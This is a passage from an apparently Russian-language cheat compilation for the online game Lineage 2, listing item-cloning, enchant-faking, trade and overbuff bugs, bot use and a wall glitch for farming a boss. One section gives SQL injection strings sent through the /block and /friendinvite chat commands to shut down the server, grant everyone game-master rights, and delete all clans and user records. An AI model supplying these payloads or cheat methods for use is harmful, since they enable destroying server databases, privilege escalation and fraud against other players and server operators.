8)Когда вы нажмёте ENTER в том окне, произойдёт ЛОГАУТ
9)Затем выберите номер перса (того самого, которого вы только что клонировали) из раскрывающегося меню выбора чара, и нажмите "Логин"
10)Теперь у вас есть клон.
Споил баг
Идём собираем паровоз, потом слипаем их, орком шаманом (ну в общем магом с ядом) травим, в это время ваш гном делает спойл фестиваль,потом как остаётся минимум жизней у мобов,убиваем одного моба, делаем свипер, и получаем спойл со всех мобов, а не с одного убитого.
Способ заточки
1:Ставим заточку на F1
2:Ставим Антидот на F5
3:Ставим Поднять на F8
4:Выкидываем Вашу заточку из инвентаря и одновремено активируем ее, с помошью хот кея. Итог: заточка внизу под вами, а на уровне инвентаря курсор с "ложной заточкой".
5:Теперь жмем на антидоты. Когда не пьются (значит сс лагает) - кликаем по веши которую точим и видим + или - . Если плюс, то тыркаем подбор скрола и ждем конца сс лага. Соответственно если минус, то не подбираем до конца лага.
Способ овербаффа
Берем бота.
Желательно работающего и настроеного на нужный нам сервак.
Заходим чаром и юзаем на себя какойнибуть бафф желательно 1-3 баффов.
Потом через бота заходим чаром и юзаем Potion of alacrity или swift attak potion.
Далее выходим и в настройках бота ставим релогин 1 и галочку на авто релогине.
Потом заходим опять же через бота на чара, и когда пишет "enter char...", то мы жмем логаут.
Потом опять логин, но на этот раз нас сервак викидывает сам.
Мы опять заходим и когда опять появляется "enter char..." мы опять жмем логаут.
И опять заходим, чтобы нас выкинул сервак и так далее.
Что это нам дало. А дало нам это умножение нашего баффа в геометрической прогресии.
Т.е. наш овербафф состоящий из 3 баффов размножился во многа раз.
Способы инъекций
/block 'RESTART--
/block 'SHUTDOWN--
/block 'UPDATE user_data SET builder = 1 WHERE char_id > 0''-- (после рестарта - все становятся ГМами)
/block 'delete/**/pledge-- (удаление всех кланов)
/block 'delete from user_data-- (удаление всех юзеров)
/block 'exec(lin_setBuilderAccount'аккаунт',1)-- дает указанному аккаунту права ГМа
Также место /block можно использовать /friendinvite (т.к. и блок и фриенд - обращаются напрямую к БД)
Стирание клонов
Вообщем, нам потребуется :
1. Любой вепон (лучше Д грейд на всякий случай) проточенный на +3
2. 1 заточка грейда соответсвующая вепону.
3. Умение точить фейком без ВХ.
4. Сервер, на котором бывают хотябы 5-10 секундные лаги (то есть сски не юзаются, банки не пьются, не растёт какос)
Способ :
Сваливаем куда-нибудь в безлюдное место.
Берём в руки веапон, а заточку кладём на хоткей.
Потом, берём энчант, и кидаем его на пол (у вас выскочит табличка - выкинуть или нет).
Ничего не нажимаем.
Далее любыми бутылками тестим лаг, то есть пьём их раз в 1-2 секунды (предварительно, конечно, надо положить банки на хоткей).
Как только бутылка не выпилась - пошёл лаг.
Нажимаем выбросить скрол, и быстро тыкаем на хоткей с энчантом.
Потом быстро, раз в полсекунды (но не так быстро чтобы пушка при даблклике упала на бэкпэк) начинаем фигачить на вепон.
У вас в окошке системном будет чтото типа - заточилось, заточилось, заточилось, заточилось, незаточилось, заточилось - и тд,
смотря сколько успели натыкать, столько надписей и будет.
Далее лаг отходит, скрол падает на пол (а возможно и нет), и вы наблюдаете надпись - Sorry, you have been disconected
Трейд Баг
Баг с торговлей.
Проходит редко.
Человек А кладет вещи в торговлю (trade), в это время человек Б нажимает ОК, и делает рестарт. ~30% шанс что у человека А нажмется ОК и вещь перейдет человеку Б.
Убийство админа
Админа можно убить возвратом dmg (tatoo+buff+песня+танец), главное разозлить достаточно сильно, чтобы он решил тебя
завалить, но не так сильно чтобы написал //kill или забанил.
Убийство Антараса
Итак идем через гиран кастл в сторону ЛОА по карте. идем идем... встречаем горы.
Через горы не пройти ((( подходим вплотную к скале (там рядом такой камень еще лежит) и жмем кнопку вперед.
Получается что мы бежим в стену - через некоторое время нас закидывает наверх.
Открываем карту и бежим (по горе уже) в сторону антарас нест. Там такое огрооооооооомное поле.
Доходим до туда, где у антараса начинается хвост: сиречь задница и ищем место где находится стык текстур (видно как будто 2 слоя рядом сложили) - Ставим чара на этот стык.
Выходим из игры.
Заходим ботом - включаем отображение монстров и НПЦ - видим антараса.
Выбираем его - у него 10кк жизней (ойойой).
Нажимаем атаковать - ждем 2 минуты.
Выходим из бота.
Загружаем игру.
Появляемся около антараса.
Оставляем чара долбить его на всю ночь.
Весь прикол в том что антарас не кидается в ответ и не восстанавливает жизни, если к нему прийти без квеста.
Оставляем на ночь.
Утром встаем - собираем дроп (а он имеется в достатке) и читаем scroll of escape.
Фейк заточка
=== Способ 1: ===
Этот метод является достаточно неудобным и не дает 100% шанса на заточку если точить руками... Он известен почти всем, поэтому здесь изложен только вариант где для заточки нужен один человек.
а) Помещаем заточку на панель быстрых клавиш
б) Открываем окно инвентаря
в) Подходим в вархаус киперу и открываем трейд с ним
г) Окно трейда с ВК перетаскиваем на окно Трейда, так что бы одно окно находилось под другим окном
д) Кладем заточку в окно трейда
е) Нажимаем на заточку на хот баре, и подтверждаем трейд с ВК
з) Не выводя курсор за пределы инвентаря, точим вещь лежащую в паке, и узнаем шанс на заточку (то есть либо был бы физл, либозаточка) Поэкспериментировав пару суток можно узнать что при заточке на +4 максимальное количество поломок подряд 6, при +5 максимально 7 физлов. И так далее. Следовательно если вы увидите например при заточке этим методом 6 физлов подряд то вы сразу заточите вещь со 100% шансом.
Вывод: использовать этот метод руками почти не представляется возможным так как на его выполнение уходит очень много времени. Для этого можно писать скрипты на ингейме и все будет ок. Оставляете скрипт на сутки двое и получаете оружие/шмот +20.
=== Способ 2: ===
Требуется иметь в наличии предмет, заточенный до +3 или выше, требуется также иметь свиток энчанта того же класса что и предмет который хотите заточить.
а) Уйдите с другом в место где вам никто не помешает.
б) Поместите свиток энчанта на хоткей.
в) Выложите в продажу этот свиток энчанта за 1 адену, ваш друг должен будет его купить.
г) Начните продажу и затем нажмите на свитке так будто вы хотите провести заточку.
д) Не выносите курсор мыши из инвентаря.
е) Ваш друг должен купить свиток прежде шага
ж) Попробуйте заточить ваш предмет относительно которого вы собираете статистику.
Произойдет то что должно было бы произойти(провал или успех) но на самом деле ваш предмет не заточиться так как свитка энчанта у вас уже нет - ваш приятель его предусмотрительно купил. Проделав это раз 100-200 вы увидите что рандомное распределение придуманное NCSoft не такое уж и рандомное. Будет наблюдаться некоторая закономерность в удачных попытках и провалах - они будут идти целыми полосами совершенно не похожими на рандом. Вы, пронаблюдав эту закономерность, сможете на основании предыдущего опыта сделать вывод об успешности или провале следующего энчанта и соответственно точить предмет или делать фалш заточку указанным методом. Все, что выше, это описание производимых действий. Делаем так:
а) Самое оптимальное : покупаем 2 оружия одинаковых (если финансы позволяют).
б) Точим на +3 оба (ну или 1, далее поймете зачем 2 вепона желательно)
в) Сверху описание тех действий, которые вы поизводите, но замечу! не надо ни в коем случае делать 100-200 енчантов! это ни к чему не приводит! так, как первые 4-10 ложных энчантов идут последовательно, а потом рандом дикий! Производим вышеуказанную операцию по 4 раза на единицу енчанта. Проверяем, какая сейчас последовательность. В основном самое легкое заточить до +10. Итак! Вот как примерно нужно точить, и таблица на каждую единицу до +10:
+1 100%
+2 100%
+3 100%
+4 -+-+-+ (+-+-+-) или же (----++++----+++)
+5 ++---++-++----+++---
+6 +++++----+--++--
+7 +++++++++------
+8 +++-+-+++----+++
+9 ++-++--++---++--
+10 ++--+--++--+
Еще раз повторю! не делайте много энчантов, самое главно это проверить по каким из 3 видов рэндома будет точиться вещь:
а) много плюсов подряд в начале +++++--+----+
б) 2 плюса и минусы ++--++-----++-++---
в) плюс-минус +-+-+-+ 4 ложные заточки должны дать ответ.
Руководсво: После вычесления вида рэндома выбираем момент когда кидать (конечно может быть так, что вы не уверены в последовательности, тогда стоит повторить проверку). Возможные рэндомы:
а) Кидаем понастоящему после 3 или 4 плюсов в ложной заточке, если не уверены - то повторяем ложную заточку)
б) В ложном оверчанте пропускаем все минусы, пока не наткнемся на + , после + в ложном оверчаньте кидаем понастоящему.
в) После минуса в ложном кидаем понастоящему.
ЕЩЕ РАЗ ПОВТОРЮСЬ: ПРОВОДИМ ДЕЙСТВИЯ ПОСЛЕ ТОГО КАК УБЕДИЛИСЬ КАКОЙ ВИД РЭНДОМА ЗАДЕЙСТВОВАН НА ДАННУЮ ЕДИНИЦУ ЕНЧАНТА. ПРОВЕРКУ НУЖНО ДЕЛАТЬ СН